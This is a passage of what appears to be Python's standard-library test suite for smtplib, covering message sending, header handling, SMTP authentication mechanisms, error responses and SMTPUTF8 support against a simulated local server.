# (this behavior is specific to smtpd.SMTPChannel)
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.helo()
expected = (503, b'Duplicate HELO/EHLO')
self.assertEqual(smtp.helo(), expected)
smtp.quit()
def testHELP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
self.assertEqual(smtp.help(), b'Supported commands: EHLO HELO MAIL ' + \
b'RCPT DATA RSET NOOP QUIT VRFY')
smtp.quit()
def testSend(self):
# connect and send mail
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX(nnorwitz): this test is flaky and dies with a bad file descriptor
# in asyncore. This sleep might help, but should really be fixed
# properly by using an Event variable.
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendBinary(self):
m = b'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.decode('ascii'), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNeedingDotQuote(self):
# Issue 12283
m = '.A test\n.mes.sage.'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNullSender(self):
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.sendmail('<>', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: <>$", re.MULTILINE)
self.assertRegex(debugout, sender)
def testSendMessage(self):
m = email.mime.text.MIMEText('A test message')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.send_message(m, from_addr='John', to_addrs='Sally')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds as figuring out
# exactly what IP address format is put there is not easy (and
# irrelevant to our test). Typically 127.0.0.1 or ::1, but it is
# not always the same as socket.gethostbyname(HOST). :(
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
def testSendMessageWithAddresses(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
# make sure the Bcc header is still in the message.
self.assertEqual(m['Bcc'], 'John Root <root@localhost>, "Dinsdale" '
'<warped@silly.walks.com>')
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
# The Bcc header should not be transmitted.
del m['Bcc']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Sally', 'Fred', 'root@localhost',
'warped@silly.walks.com'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSomeAddresses(self):
# Make sure nothing breaks if not all of the three 'to' headers exist
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSpecifiedAddresses(self):
# Make sure addresses specified in call override those in message.
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.send_message(m, from_addr='joe@example.com', to_addrs='foo@example.net')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: joe@example.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertNotRegex(debugout, to_addr)
recip = re.compile(r"^recips: .*'foo@example.net'.*$", re.MULTILINE)
self.assertRegex(debugout, recip)
def testSendMessageWithMultipleFrom(self):
# Sender overrides To
m = email.mime.text.MIMEText('A test message')
m['From'] = 'Bernard, Bianca'
m['Sender'] = 'the_rescuers@Rescue-Aid-Society.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: the_rescuers@Rescue-Aid-Society.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageResent(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# The Resent-Bcc headers are deleted before serialization.
del m['Bcc']
del m['Resent-Bcc']
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: holy@grail.net$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('my_mom@great.cooker.com', 'Jeff', 'doe@losthope.net'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageMultipleResentRaises(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
m['Resent-Date'] = 'Thu, 2 Jan 1970 17:42:00 +0000'
m['Resent-To'] = 'holy@grail.net'
m['Resent-From'] = 'Martha <my_mom@great.cooker.com>, Jeff'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
with self.assertRaises(ValueError):
smtp.send_message(m)
smtp.close()
class NonConnectingTests(unittest.TestCase):
def testNotConnected(self):
# Test various operations on an unconnected SMTP object that
# should raise exceptions (at present the attempt in SMTP.send
# to reference the nonexistent 'sock' attribute of the SMTP object
# causes an AttributeError)
smtp = smtplib.SMTP()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.ehlo)
self.assertRaises(smtplib.SMTPServerDisconnected,
smtp.send, 'test msg')
def testNonnumericPort(self):
# check that non-numeric port raises OSError
self.assertRaises(OSError, smtplib.SMTP,
"localhost", "bogus")
self.assertRaises(OSError, smtplib.SMTP,
"localhost:bogus")
def testSockAttributeExists(self):
# check that sock attribute is present outside of a connect() call
# (regression test, the previous behavior raised an
# AttributeError: 'SMTP' object has no attribute 'sock')
with smtplib.SMTP() as smtp:
self.assertIsNone(smtp.sock)
class DefaultArgumentsTests(unittest.TestCase):
def setUp(self):
self.msg = EmailMessage()
self.msg['From'] = 'Páolo <főo@bar.com>'
self.smtp = smtplib.SMTP()
self.smtp.ehlo = Mock(return_value=(200, 'OK'))
self.smtp.has_extn, self.smtp.sendmail = Mock(), Mock()
def testSendMessage(self):
expected_mail_options = ('SMTPUTF8', 'BODY=8BITMIME')
self.smtp.send_message(self.msg)
self.smtp.send_message(self.msg)
self.assertEqual(self.smtp.sendmail.call_args_list[0][0][3],
expected_mail_options)
self.assertEqual(self.smtp.sendmail.call_args_list[1][0][3],
expected_mail_options)
def testSendMessageWithMailOptions(self):
mail_options = ['STARTTLS']
expected_mail_options = ('STARTTLS', 'SMTPUTF8', 'BODY=8BITMIME')
self.smtp.send_message(self.msg, None, None, mail_options)
self.assertEqual(mail_options, ['STARTTLS'])
self.assertEqual(self.smtp.sendmail.call_args_list[0][0][3],
expected_mail_options)
# test response of client to a non-successful HELO message
class BadHELOServerTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
mock_socket.reply_with(b"199 no hello for you!")
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.port = 25
def tearDown(self):
smtplib.socket = socket
sys.stdout = self.old_stdout
def testFailingHELO(self):
self.assertRaises(smtplib.SMTPConnectError, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
class TooLongLineTests(unittest.TestCase):
respdata = b'250 OK' + (b'.' * smtplib._MAXLINE * 2) + b'\n'
def setUp(self):
self.thread_key = threading_setup()
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(15)
self.port = support.bind_port(self.sock)
servargs = (self.evt, self.respdata, self.sock)
self.thread = threading.Thread(target=server, args=servargs)
self.thread.start()
self.evt.wait()
self.evt.clear()
def tearDown(self):
self.evt.wait()
sys.stdout = self.old_stdout
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def testLineTooLong(self):
self.assertRaises(smtplib.SMTPResponseException, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
sim_users = {'Mr.A@somewhere.com':'John A',
'Ms.B@xn--fo-fka.com':'Sally B',
'Mrs.C@somewhereesle.com':'Ruth C',
}
sim_auth = ('Mr.A@somewhere.com', 'somepassword')
sim_cram_md5_challenge = ('PENCeUxFREJoU0NnbmhNWitOMjNGNn'
'dAZWx3b29kLmlubm9zb2Z0LmNvbT4=')
sim_lists = {'list-1':['Mr.A@somewhere.com','Mrs.C@somewhereesle.com'],
'list-2':['Ms.B@xn--fo-fka.com',],
}
# Simulated SMTP channel & server
class ResponseException(Exception): pass
class SimSMTPChannel(smtpd.SMTPChannel):
quit_response = None
mail_response = None
rcpt_response = None
data_response = None
rcpt_count = 0
rset_count = 0
disconnect = 0
AUTH = 99 # Add protocol state to enable auth testing.
authenticated_user = None
def __init__(self, extra_features, *args, **kw):
self._extrafeatures = ''.join(
[ "250-{0}\r\n".format(x) for x in extra_features ])
super(SimSMTPChannel, self).__init__(*args, **kw)
# AUTH related stuff. It would be nice if support for this were in smtpd.
def found_terminator(self):
if self.smtp_state == self.AUTH:
line = self._emptystring.join(self.received_lines)
print('Data:', repr(line), file=smtpd.DEBUGSTREAM)
self.received_lines = []
try:
self.auth_object(line)
except ResponseException as e:
self.smtp_state = self.COMMAND
self.push('%s %s' % (e.smtp_code, e.smtp_error))
return
super().found_terminator()
def smtp_AUTH(self, arg):
if not self.seen_greeting:
self.push('503 Error: send EHLO first')
return
if not self.extended_smtp or 'AUTH' not in self._extrafeatures:
self.push('500 Error: command "AUTH" not recognized')
return
if self.authenticated_user is not None:
self.push(
'503 Bad sequence of commands: already authenticated')
return
args = arg.split()
if len(args) not in [1, 2]:
self.push('501 Syntax: AUTH <mechanism> [initial-response]')
return
auth_object_name = '_auth_%s' % args[0].lower().replace('-', '_')
try:
self.auth_object = getattr(self, auth_object_name)
except AttributeError:
self.push('504 Command parameter not implemented: unsupported '
' authentication mechanism {!r}'.format(auth_object_name))
return
self.smtp_state = self.AUTH
self.auth_object(args[1] if len(args) == 2 else None)
def _authenticated(self, user, valid):
if valid:
self.authenticated_user = user
self.push('235 Authentication Succeeded')
else:
self.push('535 Authentication credentials invalid')
self.smtp_state = self.COMMAND
def _decode_base64(self, string):
return base64.decodebytes(string.encode('ascii')).decode('utf-8')
def _auth_plain(self, arg=None):
if arg is None:
self.push('334 ')
else:
logpass = self._decode_base64(arg)
try:
*_, user, password = logpass.split('\0')
except ValueError as e:
self.push('535 Splitting response {!r} into user and password'
' failed: {}'.format(logpass, e))
return
self._authenticated(user, password == sim_auth[1])
def _auth_login(self, arg=None):
if arg is None:
# base64 encoded 'Username:'
self.push('334 VXNlcm5hbWU6')
elif not hasattr(self, '_auth_login_user'):
self._auth_login_user = self._decode_base64(arg)
# base64 encoded 'Password:'
self.push('334 UGFzc3dvcmQ6')
else:
password = self._decode_base64(arg)
self._authenticated(self._auth_login_user, password == sim_auth[1])
del self._auth_login_user
def _auth_cram_md5(self, arg=None):
if arg is None:
self.push('334 {}'.format(sim_cram_md5_challenge))
else:
logpass = self._decode_base64(arg)
try:
user, hashed_pass = logpass.split()
except ValueError as e:
self.push('535 Splitting response {!r} into user and password '
'failed: {}'.format(logpass, e))
return False
valid_hashed_pass = hmac.HMAC(
sim_auth[1].encode('ascii'),
self._decode_base64(sim_cram_md5_challenge).encode('ascii'),
'md5').hexdigest()
self._authenticated(user, hashed_pass == valid_hashed_pass)
# end AUTH related stuff.
def smtp_EHLO(self, arg):
resp = ('250-testhost\r\n'
'250-EXPN\r\n'
'250-SIZE 20000000\r\n'
'250-STARTTLS\r\n'
'250-DELIVERBY\r\n')
resp = resp + self._extrafeatures + '250 HELP'
self.push(resp)
self.seen_greeting = arg
self.extended_smtp = True
def smtp_VRFY(self, arg):
# For max compatibility smtplib should be sending the raw address.
if arg in sim_users:
self.push('250 %s %s' % (sim_users[arg], smtplib.quoteaddr(arg)))
else:
self.push('550 No such user: %s' % arg)
def smtp_EXPN(self, arg):
list_name = arg.lower()
if list_name in sim_lists:
user_list = sim_lists[list_name]
for n, user_email in enumerate(user_list):
quoted_addr = smtplib.quoteaddr(user_email)
if n < len(user_list) - 1:
self.push('250-%s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('250 %s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('550 No access for you!')
def smtp_QUIT(self, arg):
if self.quit_response is None:
super(SimSMTPChannel, self).smtp_QUIT(arg)
else:
self.push(self.quit_response)
self.close_when_done()
def smtp_MAIL(self, arg):
if self.mail_response is None:
super().smtp_MAIL(arg)
else:
self.push(self.mail_response)
if self.disconnect:
self.close_when_done()
def smtp_RCPT(self, arg):
if self.rcpt_response is None:
super().smtp_RCPT(arg)
return
self.rcpt_count += 1
self.push(self.rcpt_response[self.rcpt_count-1])
def smtp_RSET(self, arg):
self.rset_count += 1
super().smtp_RSET(arg)
def smtp_DATA(self, arg):
if self.data_response is None:
super().smtp_DATA(arg)
else:
self.push(self.data_response)
def handle_error(self):
raise
class SimSMTPServer(smtpd.SMTPServer):
channel_class = SimSMTPChannel
def __init__(self, *args, **kw):
self._extra_features = []
self._addresses = {}
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(
self._extra_features, self, conn, addr,
decode_data=self._decode_data)
def process_message(self, peer, mailfrom, rcpttos, data):
self._addresses['from'] = mailfrom
self._addresses['tos'] = rcpttos
def add_feature(self, feature):
self._extra_features.append(feature)
def handle_error(self):
raise
# Test various SMTP & ESMTP commands/behaviors that require a simulated server
# (i.e., something with more features than DebuggingServer)
class SMTPSimTests(unittest.TestCase):
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPServer((HOST, 0), ('nowhere', -1), decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def testBasic(self):
# smoke test
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.quit()
def testEHLO(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
# no features should be present before the EHLO
self.assertEqual(smtp.esmtp_features, {})
# features expected from the test server
expected_features = {'expn':'',
'size': '20000000',
'starttls': '',
'deliverby': '',
'help': '',
}
smtp.ehlo()
self.assertEqual(smtp.esmtp_features, expected_features)
for k in expected_features:
self.assertTrue(smtp.has_extn(k))
self.assertFalse(smtp.has_extn('unsupported-feature'))
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
for addr_spec, name in sim_users.items():
expected_known = (250, bytes('%s %s' %
(name, smtplib.quoteaddr(addr_spec)),
"ascii"))
self.assertEqual(smtp.vrfy(addr_spec), expected_known)
u = 'nobody@nowhere.com'
expected_unknown = (550, ('No such user: %s' % u).encode('ascii'))
self.assertEqual(smtp.vrfy(u), expected_unknown)
smtp.quit()
def testEXPN(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
for listname, members in sim_lists.items():
users = []
for m in members:
users.append('%s %s' % (sim_users[m], smtplib.quoteaddr(m)))
expected_known = (250, bytes('\n'.join(users), "ascii"))
self.assertEqual(smtp.expn(listname), expected_known)
u = 'PSU-Members-List'
expected_unknown = (550, b'No access for you!')
self.assertEqual(smtp.expn(u), expected_unknown)
smtp.quit()
def testAUTH_PLAIN(self):
self.serv.add_feature("AUTH PLAIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_LOGIN(self):
self.serv.add_feature("AUTH LOGIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_CRAM_MD5(self):
self.serv.add_feature("AUTH CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_multiple(self):
# Test that multiple authentication methods are tried.
self.serv.add_feature("AUTH BOGUS PLAIN LOGIN CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_auth_function(self):
supported = {'CRAM-MD5', 'PLAIN', 'LOGIN'}
for mechanism in supported:
self.serv.add_feature("AUTH {}".format(mechanism))
for mechanism in supported:
with self.subTest(mechanism=mechanism):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost', timeout=15)
smtp.ehlo('foo')
smtp.user, smtp.password = sim_auth[0], sim_auth[1]
method = 'auth_' + mechanism.lower().replace('-', '_')
resp = smtp.auth(mechanism, getattr(smtp, method))
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_quit_resets_greeting(self):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost',
timeout=15)
code, message = smtp.ehlo()
self.assertEqual(code, 250)
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
self.assertNotIn('size', smtp.esmtp_features)
smtp.connect(HOST, self.port)
self.assertNotIn('size', smtp.esmtp_features)
smtp.ehlo_or_helo_if_needed()
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
def test_with_statement(self):
with smtplib.SMTP(HOST, self.port) as smtp:
code, message = smtp.noop()
self.assertEqual(code, 250)
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.close()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
def test_with_statement_QUIT_failure(self):
with self.assertRaises(smtplib.SMTPResponseException) as error:
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.noop()
self.serv._SMTPchannel.quit_response = '421 QUIT FAILED'
self.assertEqual(error.exception.smtp_code, 421)
self.assertEqual(error.exception.smtp_error, b'QUIT FAILED')
#TODO: add tests for correct AUTH method fallback now that the
#test infrastructure can support it.
# Issue 17498: make sure _rset does not raise SMTPServerDisconnected exception
def test__rest_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
self.serv._SMTPchannel.mail_response = '451 Requested action aborted'
self.serv._SMTPchannel.disconnect = True
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
# Issue 5713: make sure close, not rset, is called if we get a 421 error
def test_421_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
self.serv._SMTPchannel.mail_response = '421 closing connection'
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
def test_421_from_rcpt_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
self.serv._SMTPchannel.rcpt_response = ['250 accepted', '421 closing']
with self.assertRaises(smtplib.SMTPRecipientsRefused) as r:
smtp.sendmail('John', ['Sally', 'Frank', 'George'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
self.assertDictEqual(r.exception.args[0], {'Frank': (421, b'closing')})
def test_421_from_data_cmd(self):
class MySimSMTPChannel(SimSMTPChannel):
def found_terminator(self):
if self.smtp_state == self.DATA:
self.push('421 closing')
else:
super().found_terminator()
self.serv.channel_class = MySimSMTPChannel
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
with self.assertRaises(smtplib.SMTPDataError):
smtp.sendmail('John@foo.org', ['Sally@foo.org'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rcpt_count, 0)
def test_smtputf8_NotSupportedError_if_no_server_support(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertTrue(smtp.does_esmtp)
self.assertFalse(smtp.has_extn('smtputf8'))
self.assertRaises(
smtplib.SMTPNotSupportedError,
smtp.sendmail,
'John', 'Sally', '', mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
self.assertRaises(
smtplib.SMTPNotSupportedError,
smtp.mail, 'John', options=['BODY=8BITMIME', 'SMTPUTF8'])
def test_send_unicode_without_SMTPUTF8(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
self.assertRaises(UnicodeEncodeError, smtp.sendmail, 'Alice', 'Böb', '')
self.assertRaises(UnicodeEncodeError, smtp.mail, 'Älice')
def test_send_message_error_on_non_ascii_addrs_if_no_smtputf8(self):
# This test is located here and not in the SMTPUTF8SimTests
# class because it needs a "regular" SMTP server to work
msg = EmailMessage()
msg['From'] = "Páolo <főo@bar.com>"
msg['To'] = 'Dinsdale'
msg['Subject'] = 'Nudge nudge, wink, wink \u1F609'
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
with self.assertRaises(smtplib.SMTPNotSupportedError):
smtp.send_message(msg)
def test_name_field_not_included_in_envelop_addresses(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3
)
self.addCleanup(smtp.close)
message = EmailMessage()
message['From'] = email.utils.formataddr(('Michaël', 'michael@example.com'))
message['To'] = email.utils.formataddr(('René', 'rene@example.com'))
self.assertDictEqual(smtp.send_message(message), {})
self.assertEqual(self.serv._addresses['from'], 'michael@example.com')
self.assertEqual(self.serv._addresses['tos'], ['rene@example.com'])
class SimSMTPUTF8Server(SimSMTPServer):
def __init__(self, *args, **kw):
# The base SMTP server turns these on automatically, but our test
# server is set up to munge the EHLO response, so we need to provide
# them as well. And yes, the call is to SMTPServer not SimSMTPServer.
self._extra_features = ['SMTPUTF8', '8BITMIME']
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(
self._extra_features, self, conn, addr,
decode_data=self._decode_data,
enable_SMTPUTF8=self.enable_SMTPUTF8,
)
def process_message(self, peer, mailfrom, rcpttos, data, mail_options=None,
rcpt_options=None):
self.last_peer = peer
self.last_mailfrom = mailfrom
self.last_rcpttos = rcpttos
self.last_message = data
self.last_mail_options = mail_options
self.last_rcpt_options = rcpt_options
class SMTPUTF8SimTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPUTF8Server((HOST, 0), ('nowhere', -1),
decode_data=False,
enable_SMTPUTF8=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def test_test_server_supports_extensions(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertTrue(smtp.does_esmtp)
self.assertTrue(smtp.has_extn('smtputf8'))
def test_send_unicode_with_SMTPUTF8_via_sendmail(self):
m = '¡a test message containing unicode!'.encode('utf-8')
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.sendmail('Jőhn', 'Sálly', m,
mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
self.assertEqual(self.serv.last_mailfrom, 'Jőhn')
